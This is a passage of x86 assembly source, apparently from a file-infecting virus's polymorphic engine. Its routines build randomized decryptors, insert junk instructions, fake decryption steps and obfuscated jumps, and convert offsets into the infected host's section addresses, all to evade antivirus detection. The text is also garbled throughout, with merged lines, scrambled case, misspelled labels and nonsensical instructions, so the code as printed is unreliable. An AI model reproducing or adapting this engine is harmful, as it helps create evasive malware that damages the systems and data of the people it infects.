Stosw

Call get_rnd32

Stosd

Add DWORD PTR [ESI], EAX

POP EDI

RET

; ================================================== ===========================; prepare Pointer to Memory Into Fog Block, Using XOR

; ================================================== ===========================

DOFOGXOR: CALL FOGSTART

XOR EAX, DWORD PTR [EBP XRND1]

Push EDI

Push EAX

MOV EBX, DWORD PTR [EBP XRNDREG]

MOV EDI, DWORD PTR [EBP XRNDFIXPTR]

MOV AX, 0F081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

POP EAX

Stosd

POP EDI

RET

FIXFOGXOR: PUSH EDI

MOV EDI, DWORD PTR [EBP XRNDMATH]

MOV AX, 3081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call get_rnd32

Stosd

XOR DWORD PTR [ESI], EAX

POP EDI

RET

; ================================================== ===========================

Setup Fog Block

; ================================================== =========================== fogstart: MOV ESI, DWORD PTR [EBP CONDition_ptr]

MOV EAX, ESI

Call fromPoly2rva

RET

; ================================================== ===========================

Convert a Given Value in The Poly Decryptor To ITS Future RVA

;

On Entry:

EAX -> Value to Convert

ON EXIT:

EAX -> Converted Value

; ================================================== ===========================

FromPoly2rva: Push Edx

SUB EAX, DWORD PTR [EBP MAP_IS_HERE]

Add Eax, DWORD PTR [EBP HOST_BASE]

MOV EDX, DWORD PTR [EBP VIRUS_SH]

Sub Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDX SH_VIRTUALADDRESS]

POP EDX

RET

; ================================================== ===========================; Product complex end

;

On Entry:

ESI -> PTRTOEP or LOOP_POINT

; ================================================== ===========================

DOCOMPLEXCMP: CALL GET_RND32

And Al, 01H

JZ JMPENDJMPREG

; ================================================== ===========

Go Using JMP IMM

; ================================================== ===========

JMPENDJMPIMM: MOV Al, 0e9h

Stosb

MOV EAX, ESI

Sub Eax, EDI

Sub Eax, 00000004H

Stosd

RET

; ================================================== ===========; Go Using Complex Escheme

; ================================================== ===========

JMPENDJMPREG: PUSH ESI

Call Get_Valid_reg

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

MOV Al, 0B8H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call get_rnd32

Stosd

Push EAX

Push EBX

Call Gengarbageex

Mov Eax, Numjmpend

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBL_JMP_END EAX * 04H]

Lodsd

Add Eax, EBP

POP EBX

POP EDX

POP ESI

Call EAX

Push EBX

Call Gengarbageex

POP EBX

Call get_rnd32

And Al, 01H

JZ endusejmpreg

Endusepushret: MOV Al, 50h

OR Al, Byte PTR [EBX REG_MASK]

Stosb

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

Call Gengarbageex

Call gen_ret

RET

EnduseJMPREG: MOV AX, 0E0FFH

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

RET

; ================================================== ===========================

; Complex end using add; ========================================================================================================================================================================================================================== =======================================================================================================================================================

JMPENDREGADD: MOV AX, 0C081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call Extendedended

Sub Eax, EDX

Stosd

RET

; ================================================== ===========================

COMPLEX End Using Sub

; ================================================== ===========================

JMPENDREGSUB: MOV AX, 0E881H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call Extendedended

Sub Eax, EDX

NEG EAX

Stosd

RET

; ================================================== ===========================; Complex end using

; ================================================== ===========================

JMPENDREGXOR: MOV AX, 0F081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call Extendedended

XOR EAX, EDX

Stosd

RET

; ================================================== ===========================

COMPLEX Fixed Address

; ================================================== ===========================

Extendedend: MOV Eax, ESI

Call fromPoly2rva

RET

; ================================================== ===========================; Generate Init Garbage

; ================================================== ===========================

Geninitgarbage: MOV EAX, 00000005H

Call get_rnd_range

OR EAX, EAX

JZ EXITINITGARBAGE

MOV ECX, EAX

LOOP_G_I_G: PUSH ECX

MOV EAX, (End_i_G-TBL_I_G) / 04H

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBL_I_G EAX * 04H]

Lodsd

Add Eax, EBP

Call EAX

POP ECX

Loop loop_g_i_g

EXITINITGARBAGE: RET

; ================================================== ===========================

Generate Some Garbage Code

; ================================================== =========================== GENGARBAGEEX: MOV EAX, 00000004H

JMP Short GodirectTohell

Gen_Garbage: MOV EAX, 00000002H

GodirectTohell: Push ECX

PUSH ESI

Inc Byte Ptr [EBP Recursive_Level]

Call get_rnd_range

INC EAX

INC EAX

MOV ECX, EAX

LOOP_GARBAGE: PUSH ECX

MOV EAX, (end_garbage-tbl_garbage) / 04H

CMP BYTE PTR [EBP Recursive_level], 06H

JAE TOO_MUCH_SHIT

CMP BYTE PTR [EBP Recursive_level], 02H

JB OK_GEN_NUM

MOV EAX, (Save_Space-TBL_GARBAGE) / 04H

OK_GEN_NUM: CALL GET_RND_RANGE

LEA ESI, DWORD PTR [EBP TBL_GARBAGE EAX * 04H]

Lodsd

Add Eax, EBP

Call EAX

TOO_MUCH_SHIT: POP ECX

Loop loop_garbage

; ================================================== ===========

Update Recursive Level

; ================================================== ===========

EXIT_GG: DEC BYTE PTR [EBP Recursive_Level]

POP ESI

POP ECX

RET

; ================================================== ===========================; Generate Mov Reg, IMM

; ================================================== ===========================

; ================================================== ===========

Generate Mov Reg32, IMM

; ================================================== ===========

g_movreg32imm: Call get_valid_reg

MOV Al, 0B8H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call get_rnd32

Stosd

RET

; ================================================== ===========; Generate Mov reg16, IMM

; ================================================== ===========

g_movreg16imm: Call get_valid_reg

MOV AX, 0B866H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Call get_rnd32

Stosw

RET

; ================================================== ===========

Generate Mov Reg8, IMM

; ================================================== ===========

g_movreg8imm: Call get_valid_reg

TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT

JNZ A_MOVREG8IMM

Call get_rnd32

MOV Al, 0B0H

OR Al, Byte PTR [EBX REG_MASK]

Push EAX

Call get_rnd32

POP EDX

And Ax, 0004H

OR AX, DX

Stosw

A_MOVREG8IMM: RET

; ================================================== ===========================; Generate Mov REG, REG

; ================================================== ===========================

g_movregream32: Call get_rnd_reg

Push EBX

Call Get_Valid_reg

POP EDX

CMP EBX, EDX

JE A_MOVREGREG32

C_MoVRegreg32: Mov Al, 8BH

h_movregreg32: Mov Ah, Byte PTR [EBX REG_MASK]

SHL AH, 03H

OR AH, BYTE PTR [EDX REG_MASK]

OR AH, 0C0H

Stosw

A_MOVREGREG32: RET

g_movregream16: Call get_rnd_reg

Push EBX

Call Get_Valid_reg

POP EDX

CMP EBX, EDX

JE A_MOVREGREG32

MOV Al, 66H

Stosb

JMP short c_movregream32

g_movregream8: Call get_rnd_reg

TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT

JNZ A_MOVREGREG8

Push EBX

Call Get_Valid_reg

POP EDX

MOV Al, 8ah

H_Movregreg8: Test Byte Ptr [EBX REG_FLAGS], REG_NO_8BIT

JNZ A_MOVREGREG8

CMP EBX, EDX

JE A_MOVREGREG8

MOV AH, BYTE PTR [EBX REG_MASK]

SHL AH, 03H

OR AH, BYTE PTR [EDX REG_MASK]

OR AH, 0C0H

Push EAX

Call get_rnd32

POP EDX

And Ax, 2400h

OR AX, DX

Stosw

A_MOVREGREG8: RET

; ================================================== ===========================; Generate Xchg Reg, REG

; ================================================== ===========================

g_xchgregream32: call get_valid_reg

Push EBX

Call Get_Valid_reg

POP EDX

CMP EBX, EDX

JE A_MOVREGREG32

H_xchgregreg32: Mov Al, 87h

JMP H_MOVREGREG32

g_xchgregream16: Call get_valid_reg

Push EBX

Call Get_Valid_reg

POP EDX

CMP EBX, EDX

JE A_MOVREGREG32

MOV Al, 66H

Stosb

JMP Short H_xchgregREG32

g_xchgregream8: Call get_valid_reg

TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT

JNZ A_MOVREGREG8

Push EBX

Call Get_Valid_reg

POP EDX

MOV Al, 86H

JMP H_MOVREGREG8

; ================================================== ===========================

Generate Movzx / Movsx Reg32, Reg16

; ================================================== =========================== g_movzx_movsx: Call get_rnd32

MOV AH, 0B7H

And Al, 01H

JZ D_MOVZX

MOV AH, 0BFH

D_Movzx: MOV Al, 0FH

Stosw

Call get_rnd_reg

Push EBX

Call Get_Valid_reg

POP EDX

MOV Al, Byte PTR [EBX REG_MASK]

SHL Al, 03H

OR Al, 0C0H

OR Al, Byte PTR [EDX REG_MASK]

Stosb

RET

; ================================================== ===========================

Generate Inc REG

; ================================================== ===========================

g_inc_reg32: Call Get_Valid_REG

MOV Al, 40h

OR Al, Byte PTR [EBX REG_MASK]

Stosb

RET

g_inc_reg16: MOV Al, 66H

Stosb

JMP short g_inc_reg32

g_inc_reg8: Call Get_Valid_REG

TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT

JNZ A_INC_REG8

Call get_rnd32

And Ah, 04H

OR AH, BYTE PTR [EBX REG_MASK]

OR AH, 0C0HMOV Al, 0FEH

Stosw

A_inc_reg8: RET

; ================================================== ===========================

Generate Dec REG

; ================================================== ===========================

g_dec_reg32: Call Get_Valid_reg

MOV Al, 48h

OR Al, Byte PTR [EBX REG_MASK]

Stosb

RET

g_dec_reg16: MOV Al, 66H

Stosb

JMP Short G_Dec_reg32

g_dec_reg8: Call Get_Valid_Reg

TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT

JNZ A_DEC_REG8

Call get_rnd32

And Ah, 04H

OR AH, BYTE PTR [EBX REG_MASK]

OR AH, 0C8H

Mov Al, 0FEH

Stosw

A_DEC_REG8: RET

; ================================================== ===========================

Genereate Add / Sub / xor / or / and reg, IMM

; ================================================== =========================== g_mathregimm32: MOV Al, 81H

Stosb

Call Get_Valid_reg

Call do_math_work

Stosd

RET

g_mathregimm16: MOV AX, 8166H

Stosw

Call Get_Valid_reg

Call do_math_work

Stosw

RET

g_mathregimm8: Call get_valid_reg

TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT

JNZ A_MATH8

MOV Al, 80h

Stosb

Call do_math_work

Stosb

And Ah, 04H

Or Byte Ptr [EDI-00000002H], AH

A_MATH8: RET

Do_math_Work: MOV EAX, END_MATH_IMM-TBL_MATH_IMM

Call get_rnd_range

LEA ESI, DWORD PTR [EBP EAX TBL_MATH_IMM]

Lodsb

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call get_rnd32

RET

; ================================================== ===========================

Generate Decryption Instructions (Real or Fake ")

; ================================================== ===========================; ===================================================================================================================================================== =======================================

Check if we are going to use a dispablement in the

Indexing Mode

; ================================================== ===========

FAKE_OR_NOT: MOV EAX, DWORD PTR [EBP FAKE_PTR_DISP]

OR EAX, EAX

JNZ more_complex

; ================================================== ===========

Choose Generator for [REG] Indexing Mode

; ================================================== =========== Mov Edx, Offset TBL_IDX_REG

Call choose_magic

JMP you_got_it

; ================================================== ===========

More fun?!?!

; ================================================== ===========

More_complex: MOV Al, Byte Ptr [EBP FAKE_BUILD_FLAGS]

Test Al, Crypt_SIMPLEX

JNZ Crypt_Xtended

; ================================================== ===========

Choose Generator for [REG IMM] Indexing Mode

; ================================================== ===========

MOV EDX, OFFSET TBL_DIS_REGCALL CHOOSE_MAGIC

; ================================================== ===========

Use Magic to Convert Some Values ​​Into

DESIRED INSTRUCTIONS

; ================================================== ===========

YOU_GOT_IT: CALL SIZE_CORRECT

MOV DL, BYTE PTR [EBP FAKE_INDEX_MASK]

Lodsb

OR Al, Al

JNZ ADN_REG_01

CMP DL, 00000101B

JE ADN_REG_02

ADN_REG_01: LODSB

OR Al, DL

Stosb

JMP Common_PART

ADN_REG_02: LODSB

Add Al, 45H

XOR AH, AH

Stosw

JMP Common_PART

; ================================================== ===========

Choose [REG REG] OR [REG REG DISP]

; ================================================== ===========

Crypt_Xtended: xor Eax, EAX

MOV DWORD PTR [EBP DISP2DISP], EAX; CLEAR DISP-over-Disp

Test Al, Crypt_Complex

JZ OK_COMPLEX; =============================================== =============

; Get Random Displacement from Current Displacement

Eeehh ?!?

; ================================================== ===========

MOV EAX, 00001000H

Call get_rnd_range

MOV DWORD PTR [EBP DISP2DISP], EAX

Call load_aux

Push EBX

Call Gengarbageex

; ================================================== ===========

Choose Generator for [REG REG IMM] Indexing Mode

; ================================================== ===========

Mov Edx, Offset TBL_PARANOIA

Call choose_magic

JMP short done_xtended

OK_COMPLEX: MOV EAX, DWORD PTR [EBP FAKE_PTR_DISP]

Call load_aux

Push EBX

Call Gengarbageex

; ================================================== ===========; Choose Generator for [REG REG] Indexing Mode

; ================================================== ===========

Mov Edx, Offset TBL_XTENDED

Call choose_magic

; ================================================== ===========

Build Decryptor Instructions

; ================================================== ===========

DONE_XTENDED: CALL SIZE_CORRECT

POP EBX

MOV DL, BYTE PTR [EBP FAKE_INDEX_MASK]

Lodsb

MOV CL, Al

OR Al, Al

JNZ ARN_REG_01

CMP DL, 00000101B

JNE ARN_REG_01

Lodsb

Add Al, 40h

Stosb

JMP Short ARN_REG_02

ARN_REG_01: MOVSB

ARN_REG_02: MOV AL, BYTE PTR [EBX REG_MASK]

SHL Al, 03H

OR Al, DL

Stosb

OR CL, CL

JNZ ARN_REG_03

CMP DL, 00000101B

JNE ARN_REG_03

XOR Al, Al

Stosb

; ================================================== ===========; Restore Aux Reg State

; ================================================== ===========

ARN_REG_03: XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

; ================================================== ===========

; Get Post-Build Flags

; ================================================== ===========

Common_part: Lodsb

; ================================================== ===========

Insert Displacement from Real Address?

; ================================================== =========== Test Al, Magic_putdisp

JZ SKIP_DISP

Push EAX

MOV EAX, DWORD PTR [EBP FAKE_PTR_DISP]

SUB EAX, DWORD PTR [EBP DISP2DISP]

NEG EAX

Stosd

POP EAX

; ================================================== ===========

Insert Key?

; ================================================== ===========

Skip_disp: Test Al, Magic_putKey

JZ Skip_Key

Call Copy_Key

Skip_key: Ret

; ================================================== ===========================

Choose a Magic Generator

; ================================================== =========================== cose_magic: MOV EAX, 00000006H

Call get_rnd_range

Add Edx, EBP

Lea ESI, DWORD PTR [EDX EAX * 04H]

Lodsd

Add Eax, EBP

Mov ESI, EAX

RET

; ================================================== ===========================

DO OPERAND SIZE CORRECTION

; ================================================== ===========================

SIZE_CORRECT: LODSB

MOV AH, BYTE PTR [EBP FAKE_OPER_SIZE]

CMP AH, 01H

Je store_correct

INC Al

CMP AH, 04H

Je store_correct

MOV AH, 66H

XCHG AH, Al

Stosw

RET

Store_CorRect: Stosb

RET

; ================================================== ===========================; Load aux reg with displacement

; ================================================== ===========================

; ================================================== ===========

Get a valid auxiliary register

; ================================================== ===========

LOAD_AUX: PUSH EAX

Call Get_Valid_reg

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

; ================================================== ===========; Move Displacement Into aux reg

; ================================================== ===========

MOV Al, 0B8H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

POP EAX

NEG EAX

Stosd

RET

; ================================================== ===========================

Generate Push REG GARBAGE POP REG

; ================================================== ===========================

g_push_g_pop: Call Gen_Garbage

Call get_rnd32

Test Al, 01H

JNZ SKIP_SP_PUSH

Call Push_With_SP

JMP Short from_push

Skip_sp_push: Call get_rnd_reg

MOV Al, 50H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call gen_garbagefrom_push: Call get_rnd32

Test Al, 01H

JZ pop_with_sp

Call Get_Valid_reg

MOV Al, 58H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call gen_garbage

RET

; ================================================== ===========================

Emulate a push instruction, Using Sub ESP, 00000004H

; ================================================== ===========================

Push_with_sp: MOV Eax, 0004EC83H

Stosd

Dec Edi

Call Gengarbageex

RET

; ================================================== ===========================

Emulate a pop instruction, using add esp, 00000004H

; ================================================== =========================== Pop_with_sp: MOV EAX, 0004C483H

Stosd

Dec Edi

Call Gengarbageex

RET

; ================================================== ===========================

Generate Ret in Different Ways

; ================================================== ===========================

GEN_RET: CALL GET_RND32

And Al, 01H

JNZ Just_Ret

Call Get_Valid_reg

MOV Al, 58H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

Push EBX

Call Gengarbageex

POP EBX

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

MOV AX, 0E0ffH

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

RET

Just_ret: MOV Al, 0C3H

Stosb

RET

; ================================================== ===========================; Generate Call without return

; ================================================== ===========================

g_call_cont: MOV Al, 0e8h

Stosb

Push EDI

Stosd

Call gen_rnd_block

POP EDX

Mov Eax, EDI

Sub Eax, EDX

Sub Eax, 00000004H

Mov DWORD PTR [EDX], EAX

Call Gengarbageex

Call get_rnd32

Test Al, 01H

JZ pop_with_sp

Call Get_Valid_reg

MOV Al, 58H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call gen_garbage

RET

; ================================================== ===========================

Generate Unconditional Jumps

; ================================================== =========================== g_jump_u: MOV Al, 0e9h

Stosb

Push EDI

Stosd

Call gen_rnd_block

POP EDX

Mov Eax, EDI

Sub Eax, EDX

Sub Eax, 00000004H

Mov DWORD PTR [EDX], EAX

Call Gengarbageex

RET

g_save_jump: MOV Al, 0e9h

Stosb

Push EDI

Stosd

Call gen_rnd_block

POP EDX

Mov Eax, EDI

Sub Eax, EDX

Sub Eax, 00000004H

Mov DWORD PTR [EDX], EAX

RET

; ================================================== ===========================

Generate Conditional Jumps

; ================================================== ===========================

g_jump_c: Call get_rnd32

And Ah, 0FH

Add Ah, 80h

Mov Al, 0FH

Stosw

Push EDI

Stosd

Call Gengarbageex

POP EDX

Mov Eax, EDI

Sub Eax, EDX

Sub Eax, 00000004H

Mov DWORD PTR [EDX], EAX

Call Gengarbageex

RET

g_save_jump_c: Call get_rnd32

And Ah, 0FH

Add Ah, 80h

Mov Al, 0FH

Stosw

XOR EAX, EAX

Stosd

RET

; ================================================== ===========================

Generate MOV [MEM], REG

; ================================================== ===========================

GEN_MOV_MEM8: MOV DL, 88H

JMP MEM8WR

GEN_MOV_MEM16: MOV Al, 66H

Stosb

GEN_MOV_MEM32: MOV DL, 89H

JMP Gen_Mem_Wr

GEN_ADD_MEM8: MOV DL, 00H

JMP MEM8WR

GEN_ADD_MEM16: MOV Al, 66H

Stosb

GEN_ADD_MEM32: MOV DL, 01H

JMP Gen_Mem_Wr

Gen_sub_mem8: MOV DL, 28H

JMP MEM8WR

Gen_sub_mem16: MOV Al, 66H

Stosb

Gen_sub_mem32: MOV DL, 29H

JMP Gen_Mem_Wr

GEN_ADC_MEM8: MOV DL, 10H

JMP MEM8WR

GEN_ADC_MEM16: MOV Al, 66H

Stosb

GEN_ADC_MEM32: MOV DL, 11H

JMP Gen_Mem_Wr

GEN_SBB_MEM8: MOV DL, 18H

JMP MEM8WR

GEN_SBB_MEM16: MOV Al, 66H

Stosb

GEN_SBB_MEM32: MOV DL, 19H

JMP Gen_Mem_Wr

GEN_OR_MEM8: MOV DL, 08H

JMP MEM8WR

GEN_OR_MEM16: MOV Al, 66H

Stosb

GEN_OR_MEM32: MOV DL, 09H

JMP Gen_Mem_Wr

GEN_AND_MEM8: MOV DL, 20H

JMP MEM8WR

GEN_AND_MEM16: MOV Al, 66H

Stosb

GEN_AND_MEM32: MOV DL, 21H

JMP Gen_Mem_Wr

GEN_XOR_MEM8: MOV DL, 30H

JMP MEM8WR

GEN_XOR_MEM16: MOV Al, 66H

Stosb

GEN_XOR_MEM32: MOV DL, 31H

JMP gen_mem_wrmem8wr: Call Gen_Mem_Wr

Call get_rnd32

And Al, 20h

Al byte PTR [EDI-00000005H], Al

RET

GEN_MEM_WR: CALL GET_RND_REG

MOV AH, BYTE PTR [EBX REG_MASK]

OR AH, AH

JNZ SKIP_WR_EAX

CMP DL, 88H

JE GEN_MEM_WR

CMP DL, 89H

JE GEN_MEM_WR

SKIP_WR_EAX: SHL AH, 03H

OR AH, 05H

MOV Al, DL

Stosw

Movzx Eax, Byte PTR [EBP NumberofDataareas]]

Call get_rnd_range

Lea ESI, DWORD PTR [EBP TBL_DATA_AREA EAX * 08H]

Lodsd

Push EAX

Lodsd

Sub Eax, 00000004H

Call get_rnd_range

POP EDX

Add Eax, EDX

Stosd

RET

; ================================================== ===========================

Generate CLC / STC / CMC / CLD / STD

; ================================================== ===========================

Gen_save_code: MOV EAX, END_SAVE_CODE-TBL_SAVE_CODE

Call get_rnd_range

MOV Al, Byte PTR [EBP TBL_SAVE_CODE EAX]

Stosb

RET

; ================================================== ===========================; Generate Fake Decrypt Instructions

; ================================================== ===========================

Gen_fake_crypt: CMP BYTE PTR [EBP Recursive_level], 03H

JAE BAD_FAKE_SIZE

CMP BYTE PTR [EBP NUMBEROFDataAreas], 02H

JB BAD_FAKE_SIZE

Push DWORD PTR [EBP FAKE_PTR_DISP]

Push DWORD PTR [EBP FAKE_CRYPT_KEY]

MOV DL, BYTE PTR [EBP FAKE_BUILD_FLAGS]

MOV DH, BYTE PTR [EBP FAKE_DEX_MASK]

SHL EDX, 08H

MOV DL, BYTE PTR [EBP FAKE_OPER_SIZE]

Push Edx

Call Get_rnd32; Get Encryption Key

MOV DWORD PTR [EBP FAKE_CRYPT_KEY], EAX

Call get_rnd32; get generation flags

MOV BYTE PTR [EBP FAKE_BUILD_FLAGS], Al

Call get_rnd32; get size of mem operand

And Al, 03H

CMP Al, 01H

JE OK_FAKE_SIZE

CMP Al, 02H

JE OK_FAKE_SIZE

INC Al

OK_FAKE_SIZE: MOV BYTE PTR [EBP FAKE_OPER_SIZE], Al

Call get_rnd32; choose displacement

And Eax, 00000001H

JZ OK_FAKE_DISP

Call get_rnd32

Call get_rnd_range

INC EAX

NEG EAX

OK_FAKE_DISP: MOV DWORD PTR [EBP FAKE_PTR_DISP], EAX

Movzx Eax, Byte PTR [EBP NumberofDataareas]]

Call get_rnd_rangelea ESI, DWORD PTR [EBP TBL_DATA_AREA EAX * 08H]

Lodsd

Add Eax, DWORD PTR [EBP FAKE_PTR_DISP]

Push EAX

Lodsd

Sub Eax, 00000004H

Call get_rnd_range

POP EDX

Add Eax, EDX

Push EAX

Call Get_Valid_reg

OR BYTE PTR [EBX REG_FLAGS], REG_IS_INDEX

MOV Al, Byte PTR [EBX REG_MASK]

MOV BYTE PTR [EBP FAKE_INDEX_MASK], Al

OR Al, 0B8H

Stosb

POP EAX

Stosd

Push EBX

Call Gengarbageex; Garbage

Call fake_or_not

Call Gengarbageex; Garbage

POP EBX

XOR BYTE PTR [EBX REG_FLAGS], REG_IS_INDEX

POP EAX

MOV BYTE PTR [EBP FAKE_OPER_SIZE], Al

SHR EAX, 08H

MOV BYTE PTR [EBP FAKE_INDEX_MASK], AH

MOV BYTE PTR [EBP FAKE_BUILD_FLAGS], Al

POP DWORD PTR [EBP FAKE_CRYPT_KEY]

POP DWORD PTR [EBP FAKE_PTR_DISP]

Bad_fake_size: Ret

; ================================================== ===========================

Get a ramdom REG

; ================================================== ===========================

GET_RND_REG: MOV EAX, 00000007H

Call get_rnd_range

LEA EBX, DWORD PTR [EBP TBL_REGS EAX * 02H]

RET

; ================================================== ===========================; Get a Ramdom REG (Avoid REG_READ_ONLY, REG_IS_COUNTER AND REG_IS_IDEX)

; ================================================== ===========================

GET_VALID_REG: CALL GET_RND_REG

MOV Al, Byte PTR [EBX REG_FLAGS]

And Al, REG_IS_INDEX or REG_IS_COUNTER or REG_READ_ONLY

Jnz get_valid_reg

RET

; ================================================== ===========================

; Load ecx with crypt_size / Oper_Size

; ================================================== ================================================================================================================= # e

XOR ECX, ECX

MOV CL, BYTE PTR [EBP OPER_SIZE]

SHR ECX, 01H

OR ECX, ECX

JZ ok_2ecx

SHR EAX, CL

JNC OK_2ECX

INC EAX

OK_2ecx: MOV ECX, EAX

RET

; ================================================== ===========================

: Generate Polymorphic Decryptor ... Whats new on this poly engine? "WHATE NEW ON THIS POLY ENGINE?

;

On Entry:

; esi -> Pointer to Code

; EDI -> Where to Generate Polymorphic Decryptor

; ECX -> Size of Area To Encrypt

Edx -> Entry Point To Code ONCE DECRYPTED

ON EXIT:

ECX -> Decryptor Size

; EDI -> End of Decryptor

;

; ================================================== ===========================

MUTATE: PUSH EBX; Save Base Address

Add Edx, EBX

MOV DWORD PTR [EBP PTRTOEP], EDX; Save Ptr To Entry-PointMov DWORD PTR [EBP PTRTOCRYPT], ESI; Save Crypt Offset

MOV DWORD PTR [EBP PTRTODECRYPT], EDI

MOV DWORD PTR [EBP SIZECRYPT], ECX; Save Size of Block

LEA ESI, DWORD PTR [EBP TBL_STARTUP]

Lea EDI, DWORD PTR [EBP TBL_REGS REG_FLAGS]

MOV ECX, 00000007H

LOOP_INIT_REGS: LODSB

Stosb

Inc EDI

Loop loop_init_regs

XOR EAX, EAX

MOV BYTE PTR [EBP NumberofDataAreas], Al; Clear # of Data Area

MOV BYTE PTR [EBP Recursive_level], Al; Clear Recursive

MOV ECX, NUM_DA

Lea EDI, DWORD PTR [EBP TBL_DATA_AREA]; Init Data Areas

LOOP_INIT_DA: StOSD

Stosd

Loop loop_init_da

Call Get_Valid_reg

MOV Al, Byte PTR [EBX REG_MASK]

MOV BYTE PTR [EBP INDEX_MASK], Al

OR BYTE PTR [EBX REG_FLAGS], REG_IS_INDEX

XOR EAX, EAX

MOV ECX, 00000005H

Lea EDI, DWORD PTR [EBP STYLE_TABLE 00000004H]

Clear_Style: Stosd

Add EDI, 00000004H

Loop clear_style

Call Get_Valid_reg

MOV Al, Byte PTR [EBX REG_MASK]

MOV BYTE PTR [EBP Counter_Mask], Al

OR BYTE PTR [EBX REG_FLAGS], REG_IS_CUNTER

Call get_rnd32

And Eax, 00000001H

JZ ok_disp

Call get_rnd32

OK_DISP: MOV DWORD PTR [EBP PTR_DISP], EAX

Call get_rnd32

MOV DWORD PTR [EBP CRYPT_KEY], EAX

Call get_rnd32

MOV BYTE PTR [EBP BUILD_FLAGS], Al

Call get_rnd32

And Al, 03H

CMP Al, 01H

JE get_size_ok

CMP Al, 02H

JE get_size_ok

INC Al

GET_SIZE_OK: MOV BYTE PTR [EBP OPER_SIZE], Al

MOV EDI, DWORD PTR [EBP PTRTODECRYPT]; PTR to Decryptor

Call gen_rnd_block; random data block

MOV ECX, 00000005H; Generate 5 Routines

Do_suBroutine: Push ECX

Routine_done: MOV EAX, 00000005H; Random STEP

Call get_rnd_range

Lea ESI, DWORD PTR [EBP STYLE_TABLE EAX * 08H]

XOR EDX, EDX; ALREADYGENERATED? CMP DWORD PTR [ESI 00000004H], EDX

JNE ROUTINE_DONE

Push EDI; Generate Routine

Call Gengarbageex

Lodsd

POP DWORD PTR [ESI]

Add Eax, EBP

Call EAX

Call Gengarbageex

Call gen_ret

Call gen_rnd_block

POP ECX; Generate Next Subroutine

Loop do_subroutine

MOV DWORD PTR [EBP Entry_Point], EDI; DECRYPTOR Entry-Point

; ================================================== ===========

; If this is the 1st Decryptor We need to save

Some Regs

; ================================================== ===========

CMP BYTE PTR [EBP ISFIRST], 00H

Je SkipsAveRegs

Mov al, reg_read_only

Or Byte PTR [EBP TBL_REG_EBX 01H], Al

Or byte PTR [EBP TBL_REG_ESI 01H], Al

Or Byte PTR [EBP TBL_REG_EDI 01H], Al

Or byte PTR [EBP TBL_REG_EBP 01H], Al

MOV BYTE PTR [EBP Recursive_Level], 04H

MOV ECX, 00000004H

Lea ESI, DWORD PTR [EBP PSHPSTEPINDEX]

Dorestorepush: Push ECX

PUSH ESI

Call Geninitgarbage

POP ESI

Lodsd

Lea EDX, DWORD PTR [EBP EAX TBLDOPUSH]

Mov Al, Byte Ptr [EDX]

Stosb

MOV DL, NOT REG_READ_ONLY

Trytofixebx: CMP Al, 053H

JNE Trytofixesi

And Byte PTR [EBP TBL_REG_EBX 01H], DL

JMP ShitisFixed

Trytofixesi: CMP Al, 056H

JNETYTOFIXEDI

And Byte PTR [EBP TBL_REG_ESI 01H], DLJMP ShitisFixed

Trytofixedi: CMP Al, 057h

JNE Trytofixebp

And Byte PTR [EBP TBL_REG_EDI 01H], DL

JMP ShitisFixed

Trytofixebp: CMP Al, 055H

Jne Shitisfixed

AND BYTE PTR [EBP TBL_REG_EBP 01H], DL

Shitisfixed: POP ECX

Loop Dorestorepush

MOV BYTE PTR [EBP Recursive_level], 00H

And Byte PTR [EBP TBL_REG_EBX 01H], DL

AND BYTE PTR [EBP TBL_REG_ESI 01H], DL

And Byte PTR [EBP TBL_REG_EDI 01H], DL

AND BYTE PTR [EBP TBL_REG_EBP 01H], DL

; ================================================== ===========

... Build The JZ / JNZ Instruction (at the end of the decryptor

; loop) at runtime

; ================================================== ===========

SkipsAveRegs: Call Gengarbageex

TEST BYTE PTR [EBP Build_Flags], Crypt_fog

JZ NOENDFOG

Fuckfogebp: Call get_valid_reg

CMP BYTE PTR [EBX REG_MASK], 00000101B

Je fuckfogebp

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

MOV DWORD PTR [EBP XRNDREG], EBX

Push EBX

MOV Al, Byte PTR [EBX REG_MASK]

OR Al, 0B8H

Stosb

Call get_rnd32

Stosd

MOV DWORD PTR [EBP XRND1], EAX

Call Gengarbageex

MOV DWORD PTR [EBP XRNDFIXPTR], EDI

Add EDI, 00000006H

Call gen_garbage

MOV DWORD PTR [EBP XRNDMATH], EDI

Add EDI, 00000006HPOP EBX

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

Call gen_garbage

; ================================================== ===========

Generate Calls to Each Routine Inside Garbage Code

; ================================================== ===========

NOENDFOG: Lea ESI, DWORD PTR [EBP STYLE_TABLE 00000004H]

MOV ECX, 00000005H

